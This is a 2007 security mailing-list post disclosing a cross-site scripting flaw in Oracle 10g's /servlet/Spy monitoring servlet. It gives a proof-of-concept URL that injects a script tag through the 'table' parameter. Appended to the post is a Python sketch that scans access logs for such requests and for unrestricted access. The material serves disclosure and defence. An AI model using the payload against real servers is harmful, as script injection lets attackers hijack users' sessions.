Message-ID: <d87b1b190703200314x770c799dja2a1ce811d09c0c1@mail.gmail.com>
Date: Tue, 20 Mar 2007 12:14:20 +0200
From: "Sea Shark" <sead3nx@...il.com>
To: bugtraq@...urityfocus.com
Subject: Oracle 10g Dynamic Monitoring Services XSS /servlet/Spy

Hi,

Access to http://somesite/servlet/Spy should be restricted. But generally database or system administrators ignore the hardening of Oracle applications or database.

I have noticed an XSS bug in Dynamic Monitoring services on Oracle-Application-Server-10g/10.1.2.0.0.

http://somesite/servlet/Spy?format=metrictable&cache=false&interval=6400000&table=%3Cscript%3Ealert('inTellectPRO')%3C/script%3E&orderby=Name

d3nx
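
Added example, not part of the original post: a log review sketch that flags /servlet/Spy requests arriving from outside an administrative network and requests whose decoded query parameters carry markup characters, the two conditions the message describes. The admin network range, the function names and the sample log lines are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: the only network that should reach the servlet (constructed value).
ADMIN_NETS = [ipaddress.ip_network("10.0.5.0/24")]
SPY_PATH = "/servlet/Spy"
# Characters that have no place in a table name or sort key.
MARKUP = re.compile(r"[<>\"'`]")
# Common Log Format: client ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

def is_admin(client):
    try:
        addr = ipaddress.ip_address(client)
    except ValueError:  # hostname in the log: treat as outside the admin range
        return False
    return any(addr in net for net in ADMIN_NETS)

def review(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    m = CLF.match(line)
    if not m:
        return []
    client, _method, target, _status = m.groups()
    url = urlsplit(target)
    if url.path != SPY_PATH:
        return []
    findings = []
    if not is_admin(client):
        findings.append("unrestricted-access")
    # parse_qsl percent-decodes values, so %3Cscript%3E is inspected as <script>.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if MARKUP.search(value):
            findings.append("markup-in-" + name)
    return findings

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE = [
    '10.0.5.17 - - [20/Mar/2007:12:00:01 +0200] "GET /servlet/Spy?format=metrictable&table=sample_table&orderby=Name HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Mar/2007:12:03:44 +0200] "GET /servlet/Spy?format=metrictable&cache=false&table=%3Cscript%3Ealert(1)%3C/script%3E&orderby=Name HTTP/1.1" 200 4211',
    '203.0.113.9 - - [20/Mar/2007:12:04:02 +0200] "GET /index.html HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(review(line), line.split('"')[1])
```

Matching is on the exact path from the post; a deployment that serves the servlet under another mount point would need SPY_PATH adjusted.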